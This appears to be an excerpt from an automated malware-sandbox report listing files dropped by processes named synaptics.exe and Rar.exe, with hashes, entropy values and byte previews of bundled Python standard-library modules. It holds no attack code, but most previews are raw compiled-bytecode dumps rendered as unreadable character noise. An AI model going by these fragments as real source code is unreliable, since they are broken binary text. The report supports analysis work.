                                                                                                                                                                                                                                  Preview:o........'-d.........................@...sF...d.Z.g.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d Z d!Z!d"Z"d#Z#d$Z$d%Z%d&Z&d'Z'd(Z(d)Z)d*Z*d+Z+d,Z,d-Z-d.Z.d/Z/d0Z0d1Z1d2Z2d3Z3d4Z4d5Z5d6Z6d7Z7d8Z8d9Z9d:Z:d;Z;d<Z<d=Z=d>Z>d?Z?d@Z@dAZAdBZBdCZCdDdE..eD...E..D...ZFe..GeF.H......i.dFe...dGe...dHe*..dIe...dJe+..dKe...dLe...dMe...dNe%..dOe0..dPe(..dQe...dRe&..dSe...dTe...dUe'..dVe5..i.dWe...dXe6..dYe...dZe1..d[e2..d\e)..d]e...d^e7..d_e...d`e...dae#..dbe...dce...dde...dee...dfe...dge ....e$e/e3e4e.e.e"e-e.e.e,e.e!dh....ZIdidj..ZJdkdl..ZKdmdn..ZLdoS.)pz.Token constants.)...tok_name..ISTERMINAL..ISNONTERMINAL..ISEOF................................................................................................................................................................. ....!...."....#....$....%....&....'....(....)....*....+....,....-........./....0....1....2....3....4....5....6....7....8....9....:....;....<....
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):17205
                                                                                                                                                                                                                                  Entropy (8bit):5.7789575475919275
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:pSAswuifIbAPaiOkoc/w3CJg+YRn9JMHfHE7BFli:pmiKAPajkoc/wyJg+Y/s87BFli
                                                                                                                                                                                                                                  MD5:2578CF6AC992A74BC49C7C6B6475DC7C
                                                                                                                                                                                                                                  SHA1:C758ECC6BED53194288A4C2F4969551F03B59B5B
                                                                                                                                                                                                                                  SHA-256:0EA9185BC1C6126EAB1F3A9EB219212D1CD9476A6A7E78D396457AFF8AC87ADD
                                                                                                                                                                                                                                  SHA-512:9580A55796E25981F21128EA84BB785D94FF4166DF70F5942140090D263606E1FAEDF26E95E75E8CC318CFE4D9F0B9B6DF48D0F65183DB7C753C869D51AEBB60
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.g.......................@...sT...d.Z.d.Z.d.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.d.d.l.m.Z...e...d.e.j...Z.e...d.e.j...Z.d.d.l.Z.e.j.g.d.....Z.[.G.d.d...d.e...d.d.....Z.d.d...Z.d.d...Z.d.d...Z.d.Z.d.Z.e.e.d.e.......e.e.....Z.d.Z d.Z!d.Z"d.Z#d.Z$e.e!e"e#e$..Z%d.Z&e.d.d ..e.e&....Z'd!e&..Z(e.e'e(..Z)e.d"e)d#....Z*e.e*e)e%..Z+d$d%..Z,e.j-d&d'....Z.e.e,....Z/d(Z0d)Z1d*Z2d+Z3e.e/d,..e/d-....Z4e.e/d...e/d/....Z5e.e6e.j7e8e.d0d1......Z9e.d2e9..Z:e.e+e:e5e ..Z;e.e;..Z<e.e/d3..e.d4d.....e/d5..e.d6d.......Z=e.d7e.e4..Z>e.e.e>e+e:e=e ....Z?i.Z@e,..D.].ZAe0e@eAd4..<.e1e@eAd6..<.e2e@eAd,..<.e3e@eAd-..<...q.eB..ZCeB..ZDe,..D.]%ZEeEd6..eEd4..f.D.].ZFeC.GeF......qIeEd-..eEd,..f.D.].ZFeD.GeF......qZ..q?d8ZHG.d9d:..d:eI..ZJG.d;d<..d<eI..ZKG.d=d>..d>..ZLd?d@..ZMdAdB..ZNdCdD..ZOdEdF..Z.dGdH..ZPdIdJ..ZQdKdL..ZRdMdN..ZSeTdOk...r.eS....d.S.d.S.)Pao...Tokenization help for Python programs...tokenize(readline) is a generator that breaks a stream
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):21719
                                                                                                                                                                                                                                  Entropy (8bit):5.297238062824675
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:IooBGsSgHvgJJpLbiO+pSbnwRG+SbL3JWFsFmpbQigBsGUa2l4cCKJJBq:IoowcHvIJpiJAngz4BNUpl4cCkJBq
                                                                                                                                                                                                                                  MD5:5B0B531AA200F7102F48A6303B5F42E6
                                                                                                                                                                                                                                  SHA1:0B7763AD5813D31FD59D7C7875F38FDC5C355E53
                                                                                                                                                                                                                                  SHA-256:890B7EF78DA3DC352B106CC722460E8F8AAC65987B940B4FF7ECCD910F8AB568
                                                                                                                                                                                                                                  SHA-512:C56CBE5243A8506906FF2DC7428474DCD021E970EF13893770DEDD8EC7D7887835D8B7010AD9DEBDA7CE2C8D06CC9836A7420A5AAF5F1168F99F2AEB60BC1FA1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.i.......................@...sJ...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.d8d.d...Z.d.d...Z.d9d.d...Z.d8d.d...Z.d8d.d...Z.d.Z.d.Z.G.d.d...d...Z.e...Z.d.d...Z.e.e.d.d.d.f.d.d...Z.e.e.d.d.f.d.d...Z.e.f.d.d...Z.d.d...Z.d.d...Z.d:d.d ..Z.d;d!d"..Z.d:d#d$..Z.d<d%d&..Z.d9d'd(..Z.d9d)d*..Z.d+d,..Z.G.d-d...d...Z.d/d0..Z.d1d2..Z.d3Z.G.d4d5..d5e ..Z!G.d6d7..d7..Z"d.S.)=z@Extract, format and print information about Python stack traces......N)...extract_stack..extract_tb..format_exception..format_exception_only..format_list..format_stack..format_tb..print_exc..format_exc..print_exception..print_last..print_stack..print_tb..clear_frames..FrameSummary..StackSummary..TracebackException..walk_stack..walk_tbc....................C...s4...|.d.u.r.t.j.}.t...|.......D.].}.t.|.|.d.d.....q.d.S.).zyPrint the list of tuples as returned by extract_tb() or. extract_stack() as a formatted stack trace to the given file.N......file..end)...sys..stderrr......from_list..format..print)...extracted_l
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9536
                                                                                                                                                                                                                                  Entropy (8bit):5.147543475999727
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:W8BGSXkI30NX7ad5RV7VIPNmXkXFNlO8U2UuLWnxq3juXvypQ1SwDFBL0GSSSOSD:jBGgfmoV4NmAFyvWLwx8pOXU/l4r/sV
                                                                                                                                                                                                                                  MD5:F046967E9C61F248D0B1060BEC61086D
                                                                                                                                                                                                                                  SHA1:5E87E274DD26A4B58F2D3E7BAC72C1F56A675697
                                                                                                                                                                                                                                  SHA-256:DDB5443FBC7C0405816E03A2F340A621A1FC3683C8B57BA3C77B47AC6B630AF8
                                                                                                                                                                                                                                  SHA-512:39B38615CBCE1854240B1994A250DA5659B00EFDA92802D35196B836AAE7DDE3D040F35545DF919C6B015AFD863EEECE08825A36CCF07AA88205CC8AC4B37A67
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.(.......................@...s....d.Z.d.d.l.Z.d.d...Z.e.e...Z.e.d.d.....Z.e.e.j...Z.e.e.j...Z.e.e.j...Z.d.d...Z.e.e.....Z.d.d...Z.e.e.....Z.d.d...Z.e...Z.e.e...Z.e.......d.d...Z.e...Z.e.e...Z.G.d.d...d...Z.e.e...j...Z.e.e...Z.e.g.j...Z.e.e.j...Z.e.e...j...Z e.e!j"..Z#e.e$j.d.....Z%e.e...Z&z.e'....e'y.......e..(..d...Z)e.e)..Z*e.e)j+..Z,d.Z)[)Y.n.w.e.e.j...Z-e.e.j...Z/[.[.[.[.[.[.d$d.d...Z0d.d...Z1d%d.d...Z2d.d...Z3G.d.d...d...Z4G.d.d...d...Z5d d!..Z6e.e7e8....Z9e.e8e!B...Z:e.e;..Z<e.d...Z=e.e>..Z?d"d#..e@..D...ZAd.S.)&zO.Define names for built-in types that aren't directly accessible as a builtin.......Nc....................C........d.S...N..r....r....r.....'C:\Users\Public\M20EKMMEH2\lib\types.py.._f...........r....c....................C...r....r....r....r....r....r....r......<lambda>....r....r....c........................s....d.....f.d.d...}.|.j.d...S.).N.....c........................r....r....r....r........ar....r......f....r....z._cell_factory.<locals>.fr....)...__closu
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):85288
                                                                                                                                                                                                                                  Entropy (8bit):5.276300689614903
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:XCXtWnoBkc6T6G9vSgukYqUwmM6eOZltKNtB21bvSF3hCOp9NxT51mWbAyfthIR3:SyV2k3k2Ntg1UQOpNb18oc3
                                                                                                                                                                                                                                  MD5:C050ED2070D4096E3C34DC2DED00EDBC
                                                                                                                                                                                                                                  SHA1:63601254012B307CB34D8C95E384D8874DE448F4
                                                                                                                                                                                                                                  SHA-256:3CF0C404A697DDE4C6E39FF4BF78806B2A9F80109D2ED7F904497ACDC6755441
                                                                                                                                                                                                                                  SHA-512:50EEA22603F01711DE797DE4EEA043A6EE76C42B0D2D2AFCA1CB69D6D8119536D7ADCF36817EBF8F792F473F96B6B90D18BBAA04BB72586BD9B0374036F7C56D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.t.......................@...s....d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...g.d...Z.d.d.d...d.d...Z.d.d.d...d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.g.Z.d.d.d...d.d...Z.e...f.d d!..Z.G.d"d#..d#..Z G.d$d%..d%..Z!G.d&d'..d'e d.d(..Z"G.d)d*..d*e"d.d(..Z#e"d+d,....Z$e"d-d.....Z%e"d/d0....Z&e"d1d2....Z'e"d3d4....Z(e"d5d6....Z)e#e.d.d...d7d8......Z*e"d9d:....Z+e"d;d<....Z,e"d=d>....Z-G.d?d@..d@e d.d(..Z.G.dAdB..dB..Z/G.dCdD..dDe e!e/d.d(..Z0G.dEdF..dFe e!d.d(..Z1G.dGdH..dHe e!d.d(..Z2G.dIdJ..dJe e!e/d.d(..Z3dKdL..Z4G.dMdN..dNe d.d(..Z5G.dOdP..dPe5d.d(..Z6G.dQdR..dRe5d.d(..Z7G.dSdT..dTe6d.d(..Z8G.dUdV..dVe7d.d(..Z9G.dWdX..dXe7d.d(..Z:G.dYdZ..dZe6d.d(..Z;d[d\..Z<G.d]d^..d^e6d.d(..Z=G.d_d`..d`e6d.d(..Z>G.dadb..db..Z?G.dcdd..dd..Z@G.dedf..df..ZAg.dg..ZBg.dh..ZCeBeC..dig...ZDdjdk..ZEdldm..ZFdndo..ZGd.drds..ZHd.dudv..ZIg.dw..dxdyg.dz..ZJG.d{d|..d|e...ZKG.d}d~..d~e?eKd...ZLG.d.d...d.e6d.d(
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3699
                                                                                                                                                                                                                                  Entropy (8bit):5.561938505627536
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:G6AByWyhU9ShozDLcLmxESqc0Ic5k4CW36/:G6AByWS2zECW3u4c/
                                                                                                                                                                                                                                  MD5:174A118F6C645E98949C462CB7EBDA94
                                                                                                                                                                                                                                  SHA1:AD49DEB3B3129D667ACD54B3BAB7E3477AE50088
                                                                                                                                                                                                                                  SHA-256:93140E48DE01C46E14E4F59DF8005DDBD35F8B30A2F7427243E7B82FF50167BC
                                                                                                                                                                                                                                  SHA-512:1A1CFBCC794597F596F64C878F164534EBB8D8C74745F5BD0079F01F8E75FAE7199BB9221E591115872EC8C22B3D71C5A5B44FAFF72E5BECDD510264827B982B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...sl...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.G.d.d...d.e...Z.d.d.d...d.d...Z.d.d.d...Z.d.d...Z.e.d.k.r4e.....d.S.d.S.).z.Implementation of the UUencode and UUdecode functions...encode(in_file, out_file [,name, mode], *, backtick=False).decode(in_file [, out_file, mode, quiet])......N)...Error..encode..decodec....................@...s....e.Z.d.Z.d.S.).r....N)...__name__..__module__..__qualname__..r....r.....$C:\Users\Public\M20EKMMEH2\lib\uu.pyr....'...s........r....F....backtickc....................C...sx...g.}.z.|.d.k.r.t.j.j.}.n/t.|.t...r;|.d.u.r.t.j...|...}.|.d.u.r1z.t...|...j.}.W.n...t.y0......Y.n.w.t.|.d...}.|...|.....|.d.k.rDt.j.j.}.n.t.|.t...rSt.|.d...}.|...|.....|.d.u.rYd.}.|.d.u.r_d.}.|...d.d...}.|...d.d...}.|...d.|.d.@.|.f.....d.......|...d...}.t.|...d.k.r.|...t.j.|.|.d.......|...d...}.t.|...d.k.s.|.r.|...d.....n.|...d.....W.|.D.].}.|.......q.d.S.|.D.].}.|.......q.w.).z.Uuencode file..-N..rb..wbi.......z.\n...z.\rz.begin %o %s.i......ascii
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13657
                                                                                                                                                                                                                                  Entropy (8bit):5.37708311819733
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:QBo+b+Hagj6xo0+q6pRkgm0PN5hltuyFBdMTtwKVv6lx2u4X:QVqHagj6xLD6t/cyFBdMTtJilx2u4X
                                                                                                                                                                                                                                  MD5:E5A661D3003F1F328DB1AF771CFD5D2A
                                                                                                                                                                                                                                  SHA1:2AF4708B24AB4DEA8905C5AB1E7CFE62CBF9F6E0
                                                                                                                                                                                                                                  SHA-256:64FDE3CA6D70AADF8E9E488D4CF90D4A2B73823B54292AA4B4D343E7D25D52D7
                                                                                                                                                                                                                                  SHA-512:D57A6841360386B1D95103F5176139D05066579389BB8E1B058D3F00CEBA7693DF3C50B7C7CF8D460CD5F288455FC0AFB6FD24B18416F89A193FE00866AF827B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.O.......................@...s....d.Z.d.d.l.Z.g.d...Z.d=d.d...Z.d>d.d...Z.d.d...Z.d.d...Z.e.Z.d.d...Z.e.Z.d.d...Z.d.e.d.d.d.f.d.d...Z.e.d.d.f.d.d...Z.d.d...Z.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.d...Z.d d!..Z.d"d#..Z.d$d%..Z.d&d'..Z.d?d)d*..Z.....d@d+d,..Z.G.d-d...d.e...Z.G.d/d0..d0e...Z.d1d2..Z.z.d.d3l.m.Z.m Z m!Z!m.Z.m.Z.m"Z"..e Z#e!Z$d4Z%W.n...e&y.......g.Z.d5Z#i.Z$d(a'd6d7..Z"d.Z%Y.n.w.e.e.j(....e%s.e)e.d8..s.e.d5e*d9d(d:....e.d;e*d(d<....e.d;e+d(d<....e.d;e,d(d<....e.d;e-d(d<....[%d.S.)Az&Python part of the warnings subsystem......N)...warn..warn_explicit..showwarning..formatwarning..filterwarnings..simplefilter..resetwarnings..catch_warningsc....................C...s....t.|.|.|.|.|.|...}.t.|.....d.S.)..7Hook to write a warning to a file; replace if you like.N)...WarningMessage.._showwarnmsg_impl)...message..category..filename..lineno..file..line..msg..r.....*C:\Users\Public\M20EKMMEH2\lib\warnings.pyr........s........r....c....................C...s....t.|.|.|.|.d.|...}.t
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):20354
                                                                                                                                                                                                                                  Entropy (8bit):5.081065523914
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:QjNLEfZTpG14+ORhWBdAP/+6BWCyljPj8j/sBMpNLRVcNh4oC+erfAh:QpeZE15QhWBdg/+6zyhOpNHS/CXLAh
                                                                                                                                                                                                                                  MD5:A2D75321057A236D4499B27D53386495
                                                                                                                                                                                                                                  SHA1:731DF7D18724AF9FA2F88CB8E9BC050FB7524C2A
                                                                                                                                                                                                                                  SHA-256:ED18B5DA42316A9ED98984AC6CE9BC1CD4D076BF0D2512DE711CC12FDF2CC158
                                                                                                                                                                                                                                  SHA-512:48E2072AF2F9AA6F95A59BE344F544BBD3014CC0C8DE217AAE3ED345796736E9CEC0E8791288DD80227566486FAD422B21CDC7458E277448894BC50BE3876F98
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.V.......................@...s....d.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.e.e.f.Z.g.d...Z.e.j...e.....e.j...e.....G.d.d...d.e...Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e.j...Z.G.d.d...d...Z.d.S.).z|Weak reference support for Python...This module is an implementation of PEP 205:..https://www.python.org/dev/peps/pep-0205/......)...getweakrefcount..getweakrefs..ref..proxy..CallableProxyType..ProxyType..ReferenceType.._remove_dead_weakref)...WeakSet.._IterationGuardN).r....r....r....r......WeakKeyDictionaryr....r....r......ProxyTypes..WeakValueDictionaryr......WeakMethod..finalizec........................sD...e.Z.d.Z.d.Z.d.Z.d.d.d...Z...f.d.d...Z.d.d...Z.d.d...Z.e.j.Z.....Z.S.).r....z.. A custom `weakref.ref` subclass which simulates a weak reference to. a bound method, working around the lifetime problem of bound methods.. )..._func_ref.._meth_type.._alive..__weakref__Nc........................sx...z.|.j.}.|.j.}.W.n...
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):61046
                                                                                                                                                                                                                                  Entropy (8bit):5.525953438337611
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:cLXnJeiJWt0b6fx7SYJs5pj8bK5cYTMx/0Btq5Z:yXRWt0ufmTMSBc
                                                                                                                                                                                                                                  MD5:ABCAA8078FD005950F2B69B5D13AA68E
                                                                                                                                                                                                                                  SHA1:444ECA52D6DA27709AB05736A48D5DA35B7A724D
                                                                                                                                                                                                                                  SHA-256:55EE7D437D221FB86FFAF8ECC23DBC77717F0D4CA92AB910B684116BE5C8ABAD
                                                                                                                                                                                                                                  SHA-512:CE65F8B826BCBAF8542907B36FF9373653DD4FDF5CEC99206EE5410949418F584B4FC01BE46B09A2EE639279FF1EB82B4D66BF7AD700F1AFFF8BB4DC783BF304
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.g.......................@...sD...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.z.d.d.l.Z.e.j.Z.W.n...e.yQ......d.Z.e.j.Z.Y.n.w.z.d.d.l.Z.W.n...e.yc......d.Z.Y.n.w.z.d.d.l.Z.W.n...e.yu......d.Z.Y.n.w.g.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.e...Z.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z d.Z!d.Z"d.Z#d.Z$d.Z%d.Z&d.Z'd.Z(e..)e'..Z*d.Z+d.Z,d.Z-d.Z.d.Z/d.Z0d.Z1d.Z2d.Z3d.Z4d.Z5d.Z6e..)e5..Z7d.Z8d.Z9d.Z:d.Z;d.Z<d.Z=d.Z>d.Z?d.Z@d.ZAd.ZBd.ZCd.ZDd.ZEd.ZFd ZGd!ZHd"ZId#ZJd$ZKd%ZLe..)eK..ZMd.ZNd.ZOd.ZPd.ZQd.ZRd.ZSd.ZTd.ZUd.ZVd.ZWd.ZXd.ZYd&ZZd'Z[e..)eZ..Z\d(Z]d)Z^e..)e]..Z_d.Z`d.Zad.Zbd.Zcd.Zdd.Zed.Zfd.Zgd.Zhd.Zid*Zje..kd+..Zld,d-..Zmd.d/..Znd0d1..Zod2d3..Zpd4d5..ZqG.d6d7..d7er..Zsd.atd8d9..Zud:d;..ZvG.d<d=..d=..ZwG.d>d?..d?..Zxi.d.d@..d.dA..d.dB..d.dB..d.dB..d.dB..d.dC..d.dD..d.dE..d.dF..d.dC..d.dG..d.dH..d#dI..dJdK..dLdM..dNdO..ZydPdQ..ZzdsdRdS..Z{dTdU..Z|G.dVdW..dW..Z}G.dXdY..dY..Z~G.dZd[..d[e.j...Z.G.d\d]..d]e.j...Z.G.d^d_..d_..Z.
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):61046
                                                                                                                                                                                                                                  Entropy (8bit):5.525953438337611
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:cLXnJeiJWt0B6fx7SYJs5pj8bK5cYTMx/0Btq5Z:yXRWt0kfmTMSBc
                                                                                                                                                                                                                                  MD5:817A9436030D814E8D4244ACA79F6A42
                                                                                                                                                                                                                                  SHA1:A368569ED28D3D1314E54F93EFEE8BBD743B91F8
                                                                                                                                                                                                                                  SHA-256:E60567CE289E2CA7F0BEC220908994241CF146C5138BF333F085622AF339C560
                                                                                                                                                                                                                                  SHA-512:083AE93B90D3C7579CB1E254412D799ABB1F466FD80C3FF0AEF328CDFAE537454C7673CAB0EA6104C1AF0B136BB49367ACC5C11E223688D8FCCDF84C1287EC2A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.g.......................@...sD...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.z.d.d.l.Z.e.j.Z.W.n...e.yQ......d.Z.e.j.Z.Y.n.w.z.d.d.l.Z.W.n...e.yc......d.Z.Y.n.w.z.d.d.l.Z.W.n...e.yu......d.Z.Y.n.w.g.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.e...Z.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z d.Z!d.Z"d.Z#d.Z$d.Z%d.Z&d.Z'd.Z(e..)e'..Z*d.Z+d.Z,d.Z-d.Z.d.Z/d.Z0d.Z1d.Z2d.Z3d.Z4d.Z5d.Z6e..)e5..Z7d.Z8d.Z9d.Z:d.Z;d.Z<d.Z=d.Z>d.Z?d.Z@d.ZAd.ZBd.ZCd.ZDd.ZEd.ZFd ZGd!ZHd"ZId#ZJd$ZKd%ZLe..)eK..ZMd.ZNd.ZOd.ZPd.ZQd.ZRd.ZSd.ZTd.ZUd.ZVd.ZWd.ZXd.ZYd&ZZd'Z[e..)eZ..Z\d(Z]d)Z^e..)e]..Z_d.Z`d.Zad.Zbd.Zcd.Zdd.Zed.Zfd.Zgd.Zhd.Zid*Zje..kd+..Zld,d-..Zmd.d/..Znd0d1..Zod2d3..Zpd4d5..ZqG.d6d7..d7er..Zsd.atd8d9..Zud:d;..ZvG.d<d=..d=..ZwG.d>d?..d?..Zxi.d.d@..d.dA..d.dB..d.dB..d.dB..d.dB..d.dC..d.dD..d.dE..d.dF..d.dC..d.dG..d.dH..d#dI..dJdK..dLdM..dNdO..ZydPdQ..ZzdsdRdS..Z{dTdU..Z|G.dVdW..dW..Z}G.dXdY..dY..Z~G.dZd[..d[e.j...Z.G.d\d]..d]e.j...Z.G.d^d_..d_..Z.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3359
                                                                                                                                                                                                                                  Entropy (8bit):5.102406469186923
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:108JH5EP/oN8I2Rqpb/fmfbuoakRVsRo61RmT+F8R2HR7:10roXh/fmTuoNRVsRo2RRR7
                                                                                                                                                                                                                                  MD5:4DEA757F6D3EB1A2EF11BDAAD4E23DD2
                                                                                                                                                                                                                                  SHA1:4806A790E4801C528111299BAD115F604D4C53EB
                                                                                                                                                                                                                                  SHA-256:E10D74710901AE5610CAD66273F45F24FE446CAA74AD27D3F7C199CEB92C9B21
                                                                                                                                                                                                                                  SHA-512:68249AAEAD32F52E6555FC0B688DB8A6DFD33BC0F5C975EFC8EAA0A74EEA9152318836C653790FA7C38BA2DC26D5766544B89D92BAB64372B0750F89D5360C53
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:"""Shared AIX support functions."""....import sys..import sysconfig....try:.. import subprocess..except ImportError: # pragma: no cover.. # _aix_support is used in distutils by setup.py to build C extensions,.. # before subprocess dependencies like _posixsubprocess are available... import _bootsubprocess as subprocess......def _aix_tag(vrtl, bd):.. # type: (List[int], int) -> str.. # Infer the ABI bitwidth from maxsize (assuming 64 bit as the default).. _sz = 32 if sys.maxsize == (2**31-1) else 64.. # vrtl[version, release, technology_level].. return "aix-{:1x}{:1d}{:02d}-{:04d}-{}".format(vrtl[0], vrtl[1], vrtl[2], bd, _sz)......# extract version, release and technology level from a VRMF string..def _aix_vrtl(vrmf):.. # type: (str) -> List[int].. v, r, tl = vrmf.split(".")[:3].. return [int(v[-1]), int(r), int(tl)]......def _aix_bosmp64():.. # type: () -> Tuple[str, int].. """.. Return a Tuple[str, int] e.g., ['7.1.4.34', 1806].. The fi
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2772
                                                                                                                                                                                                                                  Entropy (8bit):4.431404312247647
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:FEDKp2B5JX6YOo/SEP5iFYoe5MCyNNlYbqMgwOF8zCEuo/+5q9Wam:uDr9X6MEKb9gwuojFm
                                                                                                                                                                                                                                  MD5:977B851F41A21AB6862A9527A8490AB5
                                                                                                                                                                                                                                  SHA1:9F882F4FFF8CB58CDF9F874A7E74DBEAE824E430
                                                                                                                                                                                                                                  SHA-256:4C817B46039F0162413A4384EFFEA304E933307E9B40527C8AB02FB64079AB7D
                                                                                                                                                                                                                                  SHA-512:1B24DAA30A11A1F8E4A455558E4B2D74EBFCBF7EC1275F3D1C54EB02AD820CA037D98166B6B53C8350D9BDDAEDF0BD5EFD3E508EE6AEF186FA5BDC3193C9A374
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:"""..Basic subprocess implementation for POSIX which only uses os functions. Only..implement features required by setup.py to build C extension modules when..subprocess is unavailable. setup.py is not used on Windows..."""..import os......# distutils.spawn used by distutils.command.build_ext..# calls subprocess.Popen().wait()..class Popen:.. def __init__(self, cmd, env=None):.. self._cmd = cmd.. self._env = env.. self.returncode = None.... def wait(self):.. pid = os.fork().. if pid == 0:.. # Child process.. try:.. if self._env is not None:.. os.execve(self._cmd[0], self._cmd, self._env).. else:.. os.execv(self._cmd[0], self._cmd).. finally:.. os._exit(1).. else:.. # Parent process.. _, status = os.waitpid(pid, 0).. self.returncode = os.waitstatus_to_exitcode(status).... return self.ret
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):33455
                                                                                                                                                                                                                                  Entropy (8bit):4.523318335419718
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:IOnTX1Ewkx023y0SuqlTWbbYXxeF6tTgA/rTNq4bD5sSeWtvVUzh:lnTYYh4kreivVUzh
                                                                                                                                                                                                                                  MD5:FAA0E5D517CF78B567A197CB397B7EFC
